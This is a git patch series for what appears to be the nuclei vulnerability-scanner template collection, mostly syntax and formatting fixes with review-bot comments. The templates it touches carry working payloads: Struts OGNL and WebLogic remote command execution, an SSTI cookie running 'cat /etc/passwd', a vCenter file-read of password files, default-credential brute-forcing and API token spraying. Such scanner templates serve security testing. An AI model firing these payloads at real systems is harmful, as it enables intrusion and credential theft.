From 53fc9bcb3f7b1d5f343c0d16c7cdcd6fda5be849 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 7 Oct 2021 05:23:20 +0530
Subject: [PATCH 01/39] misc fixes
---
cves/2020/CVE-2020-9757.yaml | 2 ++
default-logins/apache/superset-default-login.yaml | 4 ++--
vulnerabilities/other/pdf-signer-ssti-to-rce.yaml | 2 ++
vulnerabilities/other/rconfig-rce.yaml | 2 +-
4 files changed, 7 insertions(+), 3 deletions(-)
diff --git a/cves/2020/CVE-2020-9757.yaml b/cves/2020/CVE-2020-9757.yaml
index fac0befccd..20bf91e5e0 100644
--- a/cves/2020/CVE-2020-9757.yaml
+++ b/cves/2020/CVE-2020-9757.yaml
@@ -22,6 +22,8 @@ requests:
path:
- "{{BaseURL}}/actions/seomatic/meta-container/meta-link-container/?uri={{228*'98'}}"
- "{{BaseURL}}/actions/seomatic/meta-container/all-meta-containers?uri={{228*'98'}}"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
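Review bot: The added `skip-variables-check: true` carries no comment saying why it is needed, so a later cleanup could remove it without noticing the effect. The `{{228*'98'}}` in both paths is sent verbatim to the target and is not a nuclei variable, which is presumably why the unresolved-variable check has to be skipped. Add a line above the flag such as `# {{...}} in path is target-side template syntax sent as-is, not a nuclei variable`. The same applies to the identical addition in pdf-signer-ssti-to-rce.yaml, where the braces sit in the `Cookie` header. The matchers block continues outside this hunk.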
diff --git a/default-logins/apache/superset-default-login.yaml b/default-logins/apache/superset-default-login.yaml
index 26ec0e941e..6169088711 100644
--- a/default-logins/apache/superset-default-login.yaml
+++ b/default-logins/apache/superset-default-login.yaml
@@ -21,11 +21,11 @@ requests:
Content-Type: application/x-www-form-urlencoded
Referer: {{BaseURL}}/admin/airflow/login
- csrf_token={{csrff_token}}&username=admin&password=admin
+ csrf_token={{csrf_token}}&username=admin&password=admin
extractors:
- type: regex
- name: csrff_token
+ name: csrf_token
group: 1
part: body
internal: true
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index 889fd93cff..f1d82689fa 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -12,6 +12,8 @@ requests:
- "{{BaseURL}}"
headers:
Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
+
+ skip-variables-check: true
matchers-condition: and
matchers:
- type: status
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index c08699eb6d..00bc474218 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -33,7 +33,7 @@ requests:
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="email"
- test@{{randstr.tld}}
+ test@{{randstr}}.tld
--01b28e152ee044338224bf647275f8eb
Content-Disposition: form-data; name="editid"
From 5072932509fd82b807c560f952ba776c00fc9263 Mon Sep 17 00:00:00 2001
From: sandeep
Date: Sun, 10 Oct 2021 06:43:30 +0530
Subject: [PATCH 02/39] more updates
---
cves/2013/CVE-2013-2251.yaml | 17 ++++++-----------
cves/2017/CVE-2017-17562.yaml | 7 ++++---
cves/2019/CVE-2019-17382.yaml | 4 +++-
cves/2020/CVE-2020-14882.yaml | 7 +++----
cves/2020/CVE-2020-7961.yaml | 3 ++-
.../grafana/grafana-default-login.yaml | 16 ++++++----------
fuzzing/adminer-panel-fuzz.yaml | 6 +++---
fuzzing/mdb-database-file.yaml | 2 --
fuzzing/prestashop-module-fuzz.yaml | 6 +++---
fuzzing/wordpress-plugins-detect.yaml | 6 ++----
fuzzing/wordpress-themes-detect.yaml | 6 ++----
miscellaneous/ntlm-directories.yaml | 4 +---
.../gitlab/gitlab-user-enumeration.yaml | 3 +--
.../gitlab/gitlab-user-open-api.yaml | 3 +--
vulnerabilities/vmware/vmware-vcenter-lfi.yaml | 5 ++---
15 files changed, 39 insertions(+), 56 deletions(-)
diff --git a/cves/2013/CVE-2013-2251.yaml b/cves/2013/CVE-2013-2251.yaml
index d322c7908c..67158a4a69 100644
--- a/cves/2013/CVE-2013-2251.yaml
+++ b/cves/2013/CVE-2013-2251.yaml
@@ -11,25 +11,19 @@ info:
requests:
- raw:
- |
- GET /index.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /index.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /login.action?§params§:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
+ GET /login.action?{{params}}:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
- |
- GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
+ GET /index.action?{{params}}%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
Host: {{Hostname}}
- Connection: close
Accept: */*
- Accept-Language: en
payloads:
params:
@@ -40,11 +34,12 @@ requests:
matchers-condition: and
matchers:
- type: status
+ condition: or
status:
- 200
- 400
- condition: or
+
- type: regex
+ part: body
regex:
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
- part: body
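Review bot: The body regex kept by this hunk only accepts account names matching `[a-z0-9]+` and numeric ids of at most four digits, so `id` output for common service accounts (constructed examples: `uid=33(www-data)`, `uid=65534(nobody)`) does not match and a vulnerable host would be reported clean. Since the hunk already reorders this matcher, widen it at the same time: `- "((u|g)id|groups)=[0-9]{1,5}\\([a-z0-9_-]+\\)"`. The regex itself is unchanged by this commit, and the matchers block starts and ends outside the hunk.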
diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml
index 0f87ecde9f..7560cc422d 100644
--- a/cves/2017/CVE-2017-17562.yaml
+++ b/cves/2017/CVE-2017-17562.yaml
@@ -91,15 +91,16 @@ requests:
- webviewer
- welcome
- attack: sniper
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
+ condition: and
words:
- "environment variable"
- - "display library search paths"
- condition: and
+ - "display library search paths"
\ No newline at end of file
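Review bot: The file now ends without a trailing newline, as the `\ No newline at end of file` marker after the last `words` entry shows, and grafana-default-login.yaml in this same patch ends the same way after `- 200`. Restore the final newline in both files. yamllint's `new-line-at-end-of-file` rule flags this, and the next edit that appends a matcher will otherwise show the last line as changed.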
diff --git a/cves/2019/CVE-2019-17382.yaml b/cves/2019/CVE-2019-17382.yaml
index 163e4ead10..24cfb039e5 100644
--- a/cves/2019/CVE-2019-17382.yaml
+++ b/cves/2019/CVE-2019-17382.yaml
@@ -22,14 +22,16 @@ requests:
payloads:
ids: helpers/wordlists/numbers.txt
- attack: sniper
+
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
+
- type: status
status:
- 200
+
- type: word
words:
- "Dashboard"
diff --git a/cves/2020/CVE-2020-14882.yaml b/cves/2020/CVE-2020-14882.yaml
index 382be20081..e36159a674 100644
--- a/cves/2020/CVE-2020-14882.yaml
+++ b/cves/2020/CVE-2020-14882.yaml
@@ -28,8 +28,7 @@ requests:
- |
POST /console/images/%252e%252e%252fconsole.portal HTTP/1.1
Host: {{Hostname}}
- cmd: §exec§
- Connection: close
+ cmd: {{exec}}
Content-Type: application/x-www-form-urlencoded; charset=utf-8
_nfpb=false&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession%28%22var%20m%20%3D%20java.lang.Class.forName%28%22weblogic.work.ExecuteThread%22%29.getDeclaredMethod%28%22getCurrentWork%22%29%3B%20var%20currThread%20%3D%20java.lang.Thread.currentThread%28%29%3B%20var%20currWork%20%3D%20m.invoke%28currThread%29%3B%20var%20f2%20%3D%20currWork.getClass%28%29.getDeclaredField%28%22connectionHandler%22%29%3B%20f2.setAccessible%28true%29%3B%20var%20connectionHandler%20%3D%20f2.get%28currWork%29%3B%20var%20f3%20%3D%20connectionHandler.getClass%28%29.getDeclaredField%28%22request%22%29%3B%20f3.setAccessible%28true%29%3B%20var%20request%20%3D%20f3.get%28connectionHandler%29%3B%20var%20command%20%3D%20request.getHeader%28%22cmd%22%29%3B%20var%20response%20%3D%20request.getResponse%28%29%3B%20var%20isWin%20%3D%20java.lang.System.getProperty%28%22os.name%22%29.toLowerCase%28%29.contains%28%22win%22%29%3B%20var%20listCmd%20%3D%20new%20java.util.ArrayList%28%29%3B%20var%20p%20%3D%20new%20java.lang.ProcessBuilder%28%22%22%29%3B%20if%28isWin%29%7Bp.command%28%22cmd.exe%22%2C%20%22%2Fc%22%2C%20command%29%3B%20%7Delse%7Bp.command%28%22%2Fbin%2Fbash%22%2C%20%22-c%22%2C%20command%29%3B%20%7D%20p.redirectErrorStream%28true%29%3B%20var%20process%20%3D%20p.start%28%29%3B%20var%20output%20%3D%20process.getInputStream%28%29%3B%20var%20scanner%20%3D%20new%20java.util.Scanner%28output%29.useDelimiter%28%22%5C%5C%5C%5CA%22%29%3B%20var%20out%20%3D%20scanner.next%28%29%3B%20var%20outputStream%20%3D%20response.getServletOutputStream%28%29%3B%20outputStream.write%28out.getBytes%28%29%29%3B%20outputStream.flush%28%29%3B%20response.getWriter%28%29.write%28%22%22%29%3B%20currThread.interrupt%28%29%3B%22%29
@@ -41,12 +40,12 @@ requests:
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "root:.*:0:0:"
- "\\[(font|extension|file)s\\]"
- condition: or
- part: body
- type: status
status:
diff --git a/cves/2020/CVE-2020-7961.yaml b/cves/2020/CVE-2020-7961.yaml
index dd62e8fa68..80017aa104 100644
--- a/cves/2020/CVE-2020-7961.yaml
+++ b/cves/2020/CVE-2020-7961.yaml
@@ -31,11 +31,12 @@ requests:
command:
- "systeminfo" # Windows
- "lsb_release -a" # Linux
- attack: sniper
matchers-condition: and
matchers:
+
- type: regex
+ condition: or
regex:
- "OS Name:.*Microsoft Windows"
- "Distributor ID:"
diff --git a/default-logins/grafana/grafana-default-login.yaml b/default-logins/grafana/grafana-default-login.yaml
index efea21f9ff..2ea6e35861 100644
--- a/default-logins/grafana/grafana-default-login.yaml
+++ b/default-logins/grafana/grafana-default-login.yaml
@@ -1,4 +1,5 @@
id: grafana-default-login
+
info:
name: Grafana Default Login
author: pdteam
@@ -19,30 +20,25 @@ requests:
Referer: {{BaseURL}}
content-type: application/json
- {"user":"admin","password":"§grafana_password§"}
-
+ {"user":"admin","password":"{{grafana_password}}"}
payloads:
grafana_password:
- prom-operator
- admin
- attack: sniper
-
matchers-condition: and
matchers:
- type: word
words:
- - grafana_session
+ - "grafana_session" # Login cookie
part: header
- # Check for 'grafana_session' cookie on valid login in the response header.
- type: word
- words:
- - Logged in
part: body
- # Check for valid string on valid login.
+ words:
+ - "Logged in" # Logged in keyword
- type: status
status:
- - 200
+ - 200
\ No newline at end of file
diff --git a/fuzzing/adminer-panel-fuzz.yaml b/fuzzing/adminer-panel-fuzz.yaml
index ad8ba27848..0676457b68 100644
--- a/fuzzing/adminer-panel-fuzz.yaml
+++ b/fuzzing/adminer-panel-fuzz.yaml
@@ -23,17 +23,17 @@ requests:
payloads:
path: helpers/wordlists/adminer-paths.txt
- attack: sniper
threads: 50
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- "- Adminer"
- - "partial(verifyVersion, "
- condition: and
+ - "partial(verifyVersion"
+
- type: status
status:
- 200
diff --git a/fuzzing/mdb-database-file.yaml b/fuzzing/mdb-database-file.yaml
index 2fe78b348f..4eab49564e 100644
--- a/fuzzing/mdb-database-file.yaml
+++ b/fuzzing/mdb-database-file.yaml
@@ -14,12 +14,10 @@ requests:
Host: {{Hostname}}
Origin: {{BaseURL}}
Accept-Language: en-US,en;q=0.9
- Connection: close
payloads:
mdbPaths: helpers/wordlists/mdb-paths.txt
- attack: sniper
threads: 50
max-size: 500 # Size in bytes - Max Size to read from server response
stop-at-first-match: true
diff --git a/fuzzing/prestashop-module-fuzz.yaml b/fuzzing/prestashop-module-fuzz.yaml
index 63fd397d99..11072add7c 100644
--- a/fuzzing/prestashop-module-fuzz.yaml
+++ b/fuzzing/prestashop-module-fuzz.yaml
@@ -1,4 +1,5 @@
id: prestashop-module-fuzz
+
info:
name: Prestashop Modules Enumeration
author: meme-lord
@@ -16,19 +17,18 @@ requests:
payloads:
path: helpers/wordlists/prestashop-modules.txt
- attack: sniper
- threads: 50
+ threads: 50
matchers-condition: and
matchers:
- type: word
+ condition: and
words:
- ""
- ""
- ""
- ""
- ""
- condition: and
- type: status
status:
diff --git a/fuzzing/wordpress-plugins-detect.yaml b/fuzzing/wordpress-plugins-detect.yaml
index 1af3f07971..c9f21082e4 100644
--- a/fuzzing/wordpress-plugins-detect.yaml
+++ b/fuzzing/wordpress-plugins-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-plugins-detect
+
info:
name: WordPress Plugins Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
pluginSlug: helpers/wordlists/wordpress-plugins.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
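Review bot: Removing `redirects: true` and `max-redirects: 1` changes what the status matcher sees, and neither the commit subject nor the template says which outcome is intended. A slug path that answers with a 3xx (trailing-slash or scheme canonicalisation) is no longer followed, so it can no longer satisfy a 200 check if that is what the status list below holds. If the aim is to stop redirects to a landing page from counting as hits, record it next to `threads: 50`, e.g. `# redirects are not followed: a 3xx to the home page must not count as a detection`. The same removal is made in wordpress-themes-detect.yaml, and the status values are outside this hunk.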
diff --git a/fuzzing/wordpress-themes-detect.yaml b/fuzzing/wordpress-themes-detect.yaml
index 9343703599..dd98af2fe3 100644
--- a/fuzzing/wordpress-themes-detect.yaml
+++ b/fuzzing/wordpress-themes-detect.yaml
@@ -1,4 +1,5 @@
id: wordpress-themes-detect
+
info:
name: WordPress Theme Detection
author: 0xcrypto
@@ -13,11 +14,8 @@ requests:
payloads:
themeSlug: helpers/wordlists/wordpress-themes.txt
- attack: sniper
- threads: 50
- redirects: true
- max-redirects: 1
+ threads: 50
matchers-condition: and
matchers:
- type: status
diff --git a/miscellaneous/ntlm-directories.yaml b/miscellaneous/ntlm-directories.yaml
index 1733d4647d..a36f3f1287 100644
--- a/miscellaneous/ntlm-directories.yaml
+++ b/miscellaneous/ntlm-directories.yaml
@@ -14,6 +14,7 @@ requests:
Host: {{Hostname}}
Authorization: NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=
+ threads: 50
payloads:
path:
- /
@@ -63,9 +64,6 @@ requests:
- /webticket/webticketservice.svcabs/
- /adfs/services/trust/2005/windowstransport
- attack: sniper
- threads: 50
-
matchers-condition: and
matchers:
- type: dsl
diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
index 70867414e7..869b0ddd14 100644
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@@ -16,10 +16,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
user: helpers/wordlists/user-list.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
index e6b7567303..8302f25e2a 100644
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@@ -15,10 +15,9 @@ requests:
Accept: application/json, text/plain, */*
Referer: {{BaseURL}}
+ threads: 50
payloads:
uid: helpers/wordlists/numbers.txt
- attack: sniper
- threads: 50
matchers-condition: and
matchers:
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
index 2fc7c98a9e..9ee7ce40bb 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@@ -12,7 +12,7 @@ info:
requests:
- raw:
- |
- GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
+ GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
Host: {{Hostname}}
payloads:
@@ -20,14 +20,13 @@ requests:
- "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
- "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
- "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
- attack: sniper
matchers-condition: and
matchers:
- type: regex
regex:
- "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
- part: body
+
- type: status
status:
- 200
From 5b8e87ac0c6b82af7ca98e9ed8a6ba88181de01d Mon Sep 17 00:00:00 2001
From: sandeep
Date: Thu, 14 Oct 2021 23:56:45 +0530
Subject: [PATCH 03/39] Adding self contained template identifier
---
.nuclei-ignore | 5 -----
token-spray/asana.yaml | 1 +
token-spray/bingmaps.yaml | 1 +
token-spray/bitly.yaml | 1 +
token-spray/buildkite.yaml | 1 +
token-spray/buttercms.yaml | 1 +
token-spray/calendly.yaml | 1 +
token-spray/circleci.yaml | 1 +
token-spray/deviantart.yaml | 1 +
token-spray/dropbox.yaml | 1 +
token-spray/github.yaml | 1 +
token-spray/google-autocomplete.yaml | 1 +
token-spray/google-customsearch.yaml | 1 +
token-spray/google-directions.yaml | 1 +
token-spray/google-elevation.yaml | 1 +
token-spray/google-fcm.yaml | 1 +
token-spray/google-findplacefromtext.yaml | 1 +
token-spray/google-gedistancematrix.yaml | 1 +
token-spray/google-geocode.yaml | 1 +
token-spray/google-geolocation.yaml | 1 +
token-spray/google-mapsembed.yaml | 1 +
token-spray/google-mapsembedadvanced.yaml | 1 +
token-spray/google-nearbysearch.yaml | 1 +
token-spray/google-nearestroads.yaml | 1 +
token-spray/google-placedetails.yaml | 1 +
token-spray/google-placesphoto.yaml | 1 +
token-spray/google-playablelocations.yaml | 1 +
token-spray/google-routetotraveled.yaml | 1 +
token-spray/google-speedlimit.yaml | 1 +
token-spray/google-staticmaps.yaml | 1 +
token-spray/google-streetview.yaml | 1 +
token-spray/google-timezone.yaml | 1 +
token-spray/googlet-extsearchplaces.yaml | 1 +
token-spray/heroku.yaml | 1 +
token-spray/hubspot.yaml | 1 +
token-spray/instagram.yaml | 1 +
token-spray/ipstack.yaml | 1 +
token-spray/iterable.yaml | 1 +
token-spray/jumpcloud.yaml | 1 +
token-spray/lokalise.yaml | 1 +
token-spray/loqate.yaml | 1 +
token-spray/mailchimp.yaml | 1 +
token-spray/mailgun.yaml | 1 +
token-spray/mapbox.yaml | 1 +
token-spray/nerdgraph.yaml | 1 +
token-spray/npm.yaml | 1 +
token-spray/openweather.yaml | 1 +
token-spray/pagerduty.yaml | 1 +
token-spray/pendo.yaml | 1 +
token-spray/pivotaltracker.yaml | 1 +
token-spray/postmark.yaml | 1 +
token-spray/sendgrid.yaml | 1 +
token-spray/slack.yaml | 1 +
token-spray/sonarcloud.yaml | 1 +
token-spray/spotify.yaml | 1 +
token-spray/square.yaml | 1 +
token-spray/stripe.yaml | 1 +
token-spray/tinypng.yaml | 1 +
token-spray/travisci.yaml | 1 +
token-spray/twitter.yaml | 1 +
token-spray/visualstudio.yaml | 1 +
token-spray/wakatime.yaml | 1 +
token-spray/weglot.yaml | 1 +
token-spray/youtube.yaml | 1 +
64 files changed, 63 insertions(+), 5 deletions(-)
diff --git a/.nuclei-ignore b/.nuclei-ignore
index 26f85418fb..bef00b4d7a 100644
--- a/.nuclei-ignore
+++ b/.nuclei-ignore
@@ -14,8 +14,3 @@ tags:
# files is a list of files to ignore template execution
# unless asked for by the user.
-
-files:
- - "token-spray/"
-
-
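Review bot: Dropping the `files:` entry leaves the two comment lines above it (`# files is a list of files to ignore template execution` / `# unless asked for by the user.`) describing a key that no longer exists in the file. It also replaces one central exclusion of `token-spray/` with a per-template `self-contained: true`, so a template added to that directory later without the flag would presumably be picked up by default runs. Either delete the stale comment or keep an explicit `files: []` under it, and consider a lint step in CI that rejects any file under `token-spray/` lacking `self-contained: true`.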
diff --git a/token-spray/asana.yaml b/token-spray/asana.yaml
index 9282cf7a4d..08645bbe99 100644
--- a/token-spray/asana.yaml
+++ b/token-spray/asana.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/bingmaps.yaml b/token-spray/bingmaps.yaml
index 0892d85b9f..86e6784911 100644
--- a/token-spray/bingmaps.yaml
+++ b/token-spray/bingmaps.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://dev.virtualearth.net/REST/v1/Locations?CountryRegion=US&adminDistrict=WA&locality=Somewhere&postalCode=98001&addressLine=100%20Main%20St.&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
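Review bot: The credential is carried in the request URL here (`...&key={{token}}`), and now that the directory is no longer excluded in `.nuclei-ignore` these templates are more likely to be run routinely. Any result line, debug dump or proxy log that records the matched URL will then likely contain a token that has just been confirmed valid. Document this at the top of the template, e.g. `# token is part of the URL: handle scan output and logs as secret material`, and prefer a header-based variant wherever the API offers one. The same applies to the other query-string templates in this patch (bitly, buttercms, circleci, hubspot, instagram, ipstack and the google-* set).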
diff --git a/token-spray/bitly.yaml b/token-spray/bitly.yaml
index 57e1d5d3d4..31eea7a7e7 100644
--- a/token-spray/bitly.yaml
+++ b/token-spray/bitly.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://api-ssl.bitly.com/v3/shorten?access_token={{token}}&longUrl=https://www.google.com"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/buildkite.yaml b/token-spray/buildkite.yaml
index 77e8e1e677..c2129bc7dd 100644
--- a/token-spray/buildkite.yaml
+++ b/token-spray/buildkite.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/buttercms.yaml b/token-spray/buttercms.yaml
index 229da7b1d5..f37c091c85 100644
--- a/token-spray/buttercms.yaml
+++ b/token-spray/buttercms.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://api.buttercms.com/v2/posts/?auth_token={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/calendly.yaml b/token-spray/calendly.yaml
index 1d8289fb37..1f2c1f434e 100644
--- a/token-spray/calendly.yaml
+++ b/token-spray/calendly.yaml
@@ -14,6 +14,7 @@ requests:
headers:
X-Token: "{{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/circleci.yaml b/token-spray/circleci.yaml
index 281d22b656..0e1d78ca22 100644
--- a/token-spray/circleci.yaml
+++ b/token-spray/circleci.yaml
@@ -12,6 +12,7 @@ requests:
path:
- "https://circleci.com/api/v1.1/me?circle-token={{token}}"
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/deviantart.yaml b/token-spray/deviantart.yaml
index 403b97a349..96b90b34b1 100644
--- a/token-spray/deviantart.yaml
+++ b/token-spray/deviantart.yaml
@@ -13,6 +13,7 @@ requests:
- "https://www.deviantart.com/api/v1/oauth2/placebo"
body: "access_token={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/dropbox.yaml b/token-spray/dropbox.yaml
index 29679e2b2f..e1f7bf1625 100644
--- a/token-spray/dropbox.yaml
+++ b/token-spray/dropbox.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Bearer {{token}}
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/github.yaml b/token-spray/github.yaml
index c6d1d560de..944225f0fe 100644
--- a/token-spray/github.yaml
+++ b/token-spray/github.yaml
@@ -14,6 +14,7 @@ requests:
headers:
Authorization: Basic {{base64('user:' + token)}}
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-autocomplete.yaml b/token-spray/google-autocomplete.yaml
index b3c459082e..d6fee5de42 100644
--- a/token-spray/google-autocomplete.yaml
+++ b/token-spray/google-autocomplete.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/autocomplete/json?input=Bingh&types=%28cities%29&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-customsearch.yaml b/token-spray/google-customsearch.yaml
index 0be1636139..0a77ff06fb 100644
--- a/token-spray/google-customsearch.yaml
+++ b/token-spray/google-customsearch.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://www.googleapis.com/customsearch/v1?cx=017576662512468239146:omuauf_lfve&q=lectures&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-directions.yaml b/token-spray/google-directions.yaml
index a6b8cea46b..483224144e 100644
--- a/token-spray/google-directions.yaml
+++ b/token-spray/google-directions.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/directions/json?origin=Disneyland&destination=Universal+Studios+Hollywood4&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-elevation.yaml b/token-spray/google-elevation.yaml
index 480bc31fb7..a9b2e001c7 100644
--- a/token-spray/google-elevation.yaml
+++ b/token-spray/google-elevation.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/elevation/json?locations=39.7391536,-104.9847034&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
diff --git a/token-spray/google-fcm.yaml b/token-spray/google-fcm.yaml
index aba6f43579..ebb916fbe5 100644
--- a/token-spray/google-fcm.yaml
+++ b/token-spray/google-fcm.yaml
@@ -15,6 +15,7 @@ requests:
Authorization: key={{token}}
Content-Type: application/json
+ self-contained: true
matchers:
- type: status
status:
diff --git a/token-spray/google-findplacefromtext.yaml b/token-spray/google-findplacefromtext.yaml
index dcecba34b2..0a4a93b767 100644
--- a/token-spray/google-findplacefromtext.yaml
+++ b/token-spray/google-findplacefromtext.yaml
@@ -11,6 +11,7 @@ requests:
path:
- "https://maps.googleapis.com/maps/api/place/findplacefromtext/json?input=Museum%20of%20Contemporary%20Art%20Australia&inputtype=textquery&fields=photos,formatted_address,name,rating,opening_hours,geometry&key={{token}}"
+ self-contained: true
matchers:
- type: word
part: body
